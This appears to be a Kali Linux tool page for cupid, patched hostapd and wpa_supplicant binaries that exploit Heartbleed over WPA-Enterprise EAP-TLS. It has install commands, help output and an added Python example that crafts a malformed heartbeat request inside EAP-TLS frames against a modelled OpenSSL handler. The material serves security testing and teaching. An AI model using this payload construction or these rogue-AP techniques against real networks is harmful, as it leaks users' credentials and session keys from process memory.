Packages and Binaries:
cupid-hostapd provides a binary of the same name that has been patched to exploit the Heartbleed vulnerability (CVE-2014-0160) over the TLS-based EAP methods used in WPA/WPA2-Enterprise wireless networks (EAP-PEAP, EAP-TLS, EAP-TTLS).
With cupid-hostapd you set up a fake (rogue) 802.1X wireless network to exploit the vulnerability on clients that try to connect to it: the patched EAP server injects a malformed TLS heartbeat request into the EAP-TLS exchange, and a client whose supplicant is linked against a vulnerable OpenSSL answers with up to 64 KB of its process memory. Because vulnerable OpenSSL handles heartbeat requests before the TLS handshake has completed, the leak does not depend on the client accepting the rogue server's certificate.
Please see presentation slides for a simple introduction to cupid: http://www.slideshare.net/lgrangeia
Installed size: 739 KB
How to install: sudo apt install cupid-hostapd
cupid-hostapd
IEEE 802.11 AP, IEEE 802.1X/WPA/WPA2/EAP/RADIUS Authenticator
root@kali:~# cupid-hostapd --help
cupid-hostapd: invalid option -- '-'
hostapd v2.1
User space daemon for IEEE 802.11 AP management,
IEEE 802.1X/WPA/WPA2/EAP/RADIUS Authenticator
Copyright (c) 2002-2014, Jouni Malinen <j@w1.fi> and contributors

usage: hostapd [-hdBKtv] [-P <PID file>] [-e <entropy file>] \
         [-g <global ctrl_iface>] [-G <group>] \
         <configuration file(s)>

options:
   -h   show this usage
   -d   show more debug messages (-dd for even more)
   -B   run daemon in the background
   -e   entropy file
   -g   global control interface path
   -G   group for control interfaces
   -P   PID file
   -K   include key data in debug messages
   -t   include timestamps in some debug messages
   -v   show hostapd version
cupid-hostapd_cli
Hostapd command-line interface
root@kali:~# cupid-hostapd_cli -h
hostapd_cli v2.1
Copyright (c) 2004-2014, Jouni Malinen <j@w1.fi> and contributors

usage: hostapd_cli [-p<path>] [-i<ifname>] [-hvB] [-a<path>] \
                   [-G<ping interval>] [command..]

Options:
  -h           help (show this usage text)
  -v           shown version information
  -p<path>     path to find control sockets (default: /var/run/hostapd)
  -a<file>     run in daemon mode executing the action file based on events from hostapd
  -B           run a daemon in the background
  -i<ifname>   Interface to listen on (default: first interface found in the socket path)

Commands:
   mib                    get MIB variables (dot1x, dot11, radius)
   sta <addr>             get MIB variables for one station
   all_sta                get MIB variables for all stations
   new_sta <addr>         add a new station
   deauthenticate <addr>  deauthenticate a station
   disassociate <addr>    disassociate a station
   get_config             show current configuration
   help                   show this usage help
   interface [ifname]     show interfaces/select interface
   level <debug level>    change debug level
   license                show full hostapd_cli license
   quit                   exit hostapd_cli
cupid-wpasupplicant
cupid-wpasupplicant provides a binary of the same name (cupid-wpa_supplicant) that has been patched to exploit the Heartbleed vulnerability (CVE-2014-0160) over the TLS-based EAP methods used in WPA/WPA2-Enterprise wireless networks (EAP-PEAP, EAP-TLS, EAP-TTLS).
With cupid-wpasupplicant you take the client side: the patched supplicant associates with a target WPA-Enterprise network, starts the EAP exchange and sends the malformed heartbeat request to the EAP server on the other side. The vulnerable component is whatever terminates TLS for EAP: that is the access point itself only when it runs an integrated EAP server; otherwise the AP relays EAP to a RADIUS server, and it is that server that leaks memory. Networks using WPA-PSK or no encryption carry no EAP-TLS exchange and are not affected by this tool.
Please see presentation slides for a simple introduction to cupid: http://www.slideshare.net/lgrangeia
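The mechanism both packages rely on, as an added example that is not part of this page and not cupid's own code: build the TLS heartbeat request whose payload_length lies about the payload size, carry it inside an EAP-TLS packet the way a supplicant (cupid-wpa_supplicant, EAP-Response) or an authenticator (cupid-hostapd, EAP-Request) would, and model the OpenSSL heartbeat handler before and after the CVE-2014-0160 fix. Byte layouts follow RFC 6520, RFC 5246 and RFC 5216; the EAP identifier, the payload and the "adjacent memory" contents are constructed for the demonstration, and the responder is a model of the bug, not a real TLS stack.

```python
"""Heartbleed (CVE-2014-0160) heartbeat request carried inside EAP-TLS.

Added example for this page; not code from cupid, hostapd or wpa_supplicant.
Byte layouts follow RFC 6520 (heartbeat), RFC 5246 (TLS record) and
RFC 5216 (EAP-TLS). The EAP identifier, the payload and the bytes standing
in for process memory are constructed for the demo.
"""
import struct
from typing import Optional, Tuple

TLS_HEARTBEAT = 24              # TLS ContentType for heartbeat messages
HB_REQUEST, HB_RESPONSE = 1, 2  # HeartbeatMessageType
HB_MIN_PADDING = 16             # RFC 6520: at least 16 bytes of padding
EAP_CODE_REQUEST, EAP_CODE_RESPONSE = 1, 2
EAP_TYPE_TLS = 13               # EAP-TLS; EAP-TTLS is 21, PEAP is 25
EAP_TLS_FLAG_L = 0x80           # "Length included" flag


def heartbeat_request(claimed_len: int, payload: bytes = b"",
                      version: Tuple[int, int] = (3, 1)) -> bytes:
    """TLS record holding a HeartbeatRequest whose payload_length lies.

    claimed_len may be far larger than len(payload); that mismatch is the
    whole bug. A correct peer rejects it, vulnerable OpenSSL obeys it.
    """
    body = struct.pack("!BH", HB_REQUEST, claimed_len) + payload
    body += b"\x00" * HB_MIN_PADDING
    return struct.pack("!BBBH", TLS_HEARTBEAT, *version, len(body)) + body


def eap_tls_frame(code: int, identifier: int, tls_data: bytes,
                  eap_type: int = EAP_TYPE_TLS) -> bytes:
    """Wrap TLS record bytes in one EAP-TLS packet (L flag set, no fragmentation).

    A supplicant sends this as an EAP-Response; an authenticator (the rogue
    AP) sends it as an EAP-Request. For PEAP/TTLS only eap_type and the low
    flag bits (protocol version) differ.
    """
    body = struct.pack("!BI", EAP_TLS_FLAG_L, len(tls_data)) + tls_data
    length = 5 + len(body)      # Code, Identifier, Length(2), Type + body
    return struct.pack("!BBHB", code, identifier, length, eap_type) + body


def unwrap_eap_tls(frame: bytes) -> Tuple[int, int, bytes]:
    """Return (code, identifier, tls_data) from an EAP-TLS packet."""
    code, ident, length, _eap_type = struct.unpack("!BBHB", frame[:5])
    if length != len(frame):
        raise ValueError("EAP Length does not match frame size")
    flags = frame[5]
    offset = 10 if flags & EAP_TLS_FLAG_L else 6   # skip TLS Message Length if present
    return code, ident, frame[offset:]


def responder(record: bytes, adjacent_memory: bytes, patched: bool) -> Optional[bytes]:
    """Model of OpenSSL's heartbeat handler, before and after the fix.

    Unpatched: trust payload_length and copy that many bytes starting at the
    payload, running past the end of the record into whatever follows it in
    memory (adjacent_memory stands in for that here).
    Patched: drop the message if payload_length exceeds the record.
    """
    _ctype, maj, minr, rec_len = struct.unpack("!BBBH", record[:5])
    body = record[5:5 + rec_len]
    hb_type, plen = struct.unpack("!BH", body[:3])
    if hb_type != HB_REQUEST:
        return None
    if patched and 1 + 2 + plen + HB_MIN_PADDING > rec_len:
        return None             # the CVE-2014-0160 bounds check
    buf = body[3:] + adjacent_memory
    echoed = buf[:plen]         # over-read when plen > len(body) - 3
    resp = struct.pack("!BH", HB_RESPONSE, plen) + echoed + b"\x00" * HB_MIN_PADDING
    return struct.pack("!BBBH", TLS_HEARTBEAT, maj, minr, len(resp)) + resp


def heartbeat_leak(record: Optional[bytes], sent_payload: bytes) -> Optional[bytes]:
    """Bytes the peer echoed beyond what we sent, or None if it did not leak."""
    if not record:
        return None
    ctype, _maj, _min, rec_len = struct.unpack("!BBBH", record[:5])
    if ctype != TLS_HEARTBEAT:
        return None
    body = record[5:5 + rec_len]
    hb_type, plen = struct.unpack("!BH", body[:3])
    if hb_type != HB_RESPONSE:
        return None
    echoed = body[3:3 + plen]
    if len(echoed) <= len(sent_payload):
        return None
    return echoed[len(sent_payload):]


if __name__ == "__main__":
    memory = b"...identity=alice password=hunter2..."   # constructed stand-in
    req = heartbeat_request(0x4000, b"hi")                # claims 16 KB, sends 2 bytes
    frame = eap_tls_frame(EAP_CODE_RESPONSE, 7, req)     # supplicant -> AP
    _, _, tls = unwrap_eap_tls(frame)
    for fixed in (False, True):
        leak = heartbeat_leak(responder(tls, memory, patched=fixed), b"hi")
        print("patched" if fixed else "vulnerable", "->", leak)
```

The leak returned by the model starts with the request's own 16 bytes of padding and then whatever sat after the record in the responder's heap, which is how real captures look too: the interesting material (identities, passwords, session keys) follows the echo of the attacker's own message. A real OpenSSL 1.0.1 build returns the full claimed length; this model stops at the end of the constructed memory.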
Installed size: 2.15 MB
How to install: sudo apt install cupid-wpasupplicant
Dependencies:
- adduser
- initscripts
- libc6
- libdbus-1-3
- libnl-3-200
- libnl-genl-3-200
- libpcsclite1
- libreadline8
- libunsafessl1.0.2
Note the libunsafessl1.0.2 dependency: this is an OpenSSL 1.0.2 build that Kali ships with insecure features left enabled, including the TLS heartbeat extension that upstream removed in OpenSSL 1.1.0; the cupid binaries need it to be able to send heartbeat requests at all.
cupid-wpa_cli
root@kali:~# cupid-wpa_cli -h
wpa_cli [-p<path to ctrl sockets>] [-i<ifname>] [-hvB] [-a<action file>] \
        [-P<pid file>] [-g<global ctrl>] [-G<ping interval>] [command..]
  -h = help (show this usage text)
  -v = shown version information
  -a = run in daemon mode executing the action file based on events from
       wpa_supplicant
  -B = run a daemon in the background
  default path: /var/run/wpa_supplicant
  default interface: first interface found in socket path
commands:
  status [verbose] = get current WPA/EAPOL/EAP status
  ifname = get current interface name
  ping = pings wpa_supplicant
  relog = re-open log-file (allow rolling logs)
  note = add a note to wpa_supplicant debug log
  mib = get MIB variables (dot1x, dot11)
  help [command] = show usage help
  interface [ifname] = show interfaces/select interface
  level = change debug level
  license = show full wpa_cli license
  quit = exit wpa_cli
  set = set variables (shows list of variables when run without arguments)
  get = get information
  logon = IEEE 802.1X EAPOL state machine logon
  logoff = IEEE 802.1X EAPOL state machine logoff
  pmksa = show PMKSA cache
  reassociate = force reassociation
  preauthenticate = force preauthentication
  identity = configure identity for an SSID
  password = configure password for an SSID
  new_password = change password for an SSID
  pin = configure pin for an SSID
  otp = configure one-time-password for an SSID
  passphrase = configure private key passphrase for an SSID
  sim = report SIM operation result
  bssid = set preferred BSSID for an SSID
  blacklist = add a BSSID to the blacklist
  blacklist clear = clear the blacklist
  blacklist = display the blacklist
  log_level <level> [<timestamp>] = update the log level/timestamp
  log_level = display the current log level and log options
  list_networks = list configured networks
  select_network = select a network (disable others)
  enable_network = enable a network
  disable_network = disable a network
  add_network = add a network
  remove_network = remove a network
  set_network = set network variables (shows list of variables when run without arguments)
  get_network = get network variables
  list_creds = list configured credentials
  add_cred = add a credential
  remove_cred = remove a credential
  set_cred = set credential variables
  save_config = save the current configuration
  disconnect = disconnect and wait for reassociate/reconnect command before connecting
  reconnect = like reassociate, but only takes effect if already disconnected
  scan = request new BSS scan
  scan_results = get latest scan results
  bss <<idx> | <bssid>> = get detailed scan result info
  get_capability = get capabilies
  reconfigure = force wpa_supplicant to re-read its configuration file
  terminate = terminate wpa_supplicant
  interface_add = adds new interface, all parameters but <ifname> are optional
  interface_remove = removes the interface
  interface_list = list available interfaces
  ap_scan = set ap_scan parameter
  scan_interval = set scan_interval parameter (in seconds)
  bss_expire_age = set BSS expiration age parameter
  bss_expire_count = set BSS expiration scan count parameter
  bss_flush = set BSS flush age (0 by default)
  stkstart = request STK negotiation with <addr>
  ft_ds = request over-the-DS FT with <addr>
  wps_pbc [BSSID] = start Wi-Fi Protected Setup: Push Button Configuration
  wps_pin [PIN] = start WPS PIN method (returns PIN, if not hardcoded)
  wps_check_pin = verify PIN checksum
  wps_cancel Cancels the pending WPS operation
  wps_nfc [BSSID] = start Wi-Fi Protected Setup: NFC
  wps_nfc_config_token = build configuration token
  wps_nfc_token = create password token
  wps_nfc_tag_read = report read NFC tag with WPS data
  nfc_get_handover_req = create NFC handover request
  nfc_get_handover_sel = create NFC handover select
  nfc_rx_handover_req = report received NFC handover request
  nfc_rx_handover_sel = report received NFC handover select
  nfc_report_handover = report completed NFC handover
  wps_reg = start WPS Registrar to configure an AP
  wps_ap_pin [params..] = enable/disable AP PIN
  wps_er_start [IP address] = start Wi-Fi Protected Setup External Registrar
  wps_er_stop = stop Wi-Fi Protected Setup External Registrar
  wps_er_pin = add an Enrollee PIN to External Registrar
  wps_er_pbc = accept an Enrollee PBC using External Registrar
  wps_er_learn = learn AP configuration
  wps_er_set_config = set AP configuration for enrolling
  wps_er_config = configure AP
  wps_er_nfc_config_token = build NFC configuration token
  ibss_rsn = request RSN authentication with <addr> in IBSS
  sta = get information about an associated station (AP)
  all_sta = get information about all associated stations (AP)
  deauthenticate = deauthenticate a station
  disassociate = disassociate a station
  chan_switch [sec_channel_offset=] [center_freq1=] [center_freq2=] [bandwidth=] [blocktx] [ht|vht] = CSA parameters
  suspend = notification of suspend/hibernate
  resume = notification of resume/thaw
  drop_sa = drop SA without deauth/disassoc (test command)
  roam = roam to the specified BSS
  p2p_find [timeout] [type=*] = find P2P Devices for up-to timeout seconds
  p2p_stop_find = stop P2P Devices search
  p2p_connect <"pbc"|PIN> [ht40] = connect to a P2P Device
  p2p_listen [timeout] = listen for P2P Devices for up-to timeout seconds
  p2p_group_remove = remove P2P group interface (terminate group if GO)
  p2p_group_add [ht40] = add a new P2P group (local end as GO)
  p2p_prov_disc = request provisioning discovery
  p2p_get_passphrase = get the passphrase for a group (GO only)
  p2p_serv_disc_req = schedule service discovery request
  p2p_serv_disc_cancel_req = cancel pending service discovery request
  p2p_serv_disc_resp = service discovery response
  p2p_service_update = indicate change in local services
  p2p_serv_disc_external = set external processing of service discovery
  p2p_service_flush = remove all stored service entries
  p2p_service_add = add a local service
  p2p_service_del [|service] = remove a local service
  p2p_reject = reject connection attempts from a specific peer
  p2p_invite [peer=addr] = invite peer
  p2p_peers [discovered] = list known (optionally, only fully discovered) P2P peers
  p2p_peer = show information about known P2P peer
  p2p_set = set a P2P parameter
  p2p_flush = flush P2P state
  p2p_cancel = cancel P2P group formation
  p2p_unauthorize = unauthorize a peer
  p2p_presence_req [<duration> <interval>] [<duration> <interval>] = request GO presence
  p2p_ext_listen [<period> <interval>] = set extended listen timing
  p2p_remove_client = remove a peer from all groups
  wfd_subelem_set [contents] = set Wi-Fi Display subelement
  wfd_subelem_get = get Wi-Fi Display subelement
  fetch_anqp = fetch ANQP information for all APs
  stop_fetch_anqp = stop fetch_anqp operation
  interworking_select [auto] = perform Interworking network selection
  interworking_connect = connect using Interworking credentials
  anqp_get <addr> <info id>[,<info id>]... = request ANQP information
  gas_request [QueryReq] = GAS request
  gas_response_get [start,len] = Fetch last GAS response
  hs20_anqp_get <addr> <subtype>[,<subtype>]... = request HS 2.0 ANQP information
  nai_home_realm_list = get HS20 nai home realm list
  sta_autoconnect = disable/enable automatic reconnection
  tdls_discover = request TDLS discovery with <addr>
  tdls_setup = request TDLS setup with <addr>
  tdls_teardown = tear down TDLS with <addr>
  signal_poll = get signal parameters
  pktcnt_poll = get TX/RX packet counters
  reauthenticate = trigger IEEE 802.1X/EAPOL reauthentication
  autoscan [params] = Set or unset (if none) autoscan parameters
  wnm_sleep [interval=#] = enter/exit WNM-Sleep mode
  wnm_bss_query = Send BSS Transition Management Query
  raw = Sent unprocessed command
  flush = flush wpa_supplicant state
  radio_work = radio_work
cupid-wpa_passphrase
Generate a WPA PSK from an ASCII passphrase for a SSID
root@kali:~# man cupid-wpa_passphrase
WPA_PASSPHRASE(8)                                            WPA_PASSPHRASE(8)

NAME
       wpa_passphrase - Generate a WPA PSK from an ASCII passphrase for a SSID

SYNOPSIS
       wpa_passphrase [ ssid ] [ passphrase ]

OVERVIEW
       wpa_passphrase pre-computes PSK entries for network configuration
       blocks of a wpa_supplicant.conf file. An ASCII passphrase and SSID are
       used to generate a 256-bit PSK.

OPTIONS
       ssid   The SSID whose passphrase should be derived.

       passphrase
              The passphrase to use. If not included on the command line,
              passphrase will be read from standard input.

SEE ALSO
       wpa_supplicant.conf(5) wpa_supplicant(8)

LEGAL
       wpa_supplicant is copyright (c) 2003-2014, Jouni Malinen <j@w1.fi> and
       contributors. All Rights Reserved.

       This program is licensed under the BSD license (the one with
       advertisement clause removed).

                                 12 April 2023               WPA_PASSPHRASE(8)
cupid-wpa_supplicant
Wi-Fi Protected Access client and IEEE 802.1X supplicant
root@kali:~# cupid-wpa_supplicant -h
wpa_supplicant v2.1
Copyright (c) 2003-2014, Jouni Malinen <j@w1.fi> and contributors

This software may be distributed under the terms of the BSD license.
See README for more details.

This product includes software developed by the OpenSSL Project
for use in the OpenSSL Toolkit (http://www.openssl.org/)

usage:
  wpa_supplicant [-BddhKLqqstuvW] [-P<pid file>] [-g<global ctrl>] \
        [-G<group>] \
        -i<ifname> -c<config file> [-C<ctrl>] [-D<driver>] [-p<driver_param>] \
        [-b<br_ifname>] [-e<entropy file>] [-f<debug file>] \
        [-o<override driver>] [-O<override ctrl>] \
        [-N -i<ifname> -c<conf> [-C<ctrl>] [-D<driver>] \
        [-p<driver_param>] [-b<br_ifname>] [-I<config file>] ...]

drivers:
  nl80211 = Linux nl80211/cfg80211
  wext = Linux wireless extensions (generic)
  wired = Wired Ethernet driver
  none = no driver (RADIUS server/WPS ER)
options:
  -b = optional bridge interface name
  -B = run daemon in the background
  -c = Configuration file
  -C = ctrl_interface parameter (only used if -c is not)
  -i = interface name
  -I = additional configuration file
  -d = increase debugging verbosity (-dd even more)
  -D = driver name (can be multiple drivers: nl80211,wext)
  -e = entropy file
  -f = log output to debug file instead of stdout
  -g = global ctrl_interface
  -G = global ctrl_interface group
  -K = include keys (passwords, etc.) in debug output
  -s = log output to syslog instead of stdout
  -T = record to Linux tracing in addition to logging
       (records all messages regardless of debug verbosity)
  -t = include timestamp in debug messages
  -h = show this help text
  -L = show license (BSD)
  -o = override driver parameter for new interfaces
  -O = override ctrl_interface parameter for new interfaces
  -p = driver parameters
  -P = PID file
  -q = decrease debugging verbosity (-qq even less)
  -u = enable DBus control interface
  -v = show version
  -W = wait for a control interface monitor before starting
  -N = start describing new interface
example:
  wpa_supplicant -Dnl80211 -iwlan0 -c/etc/wpa_supplicant.conf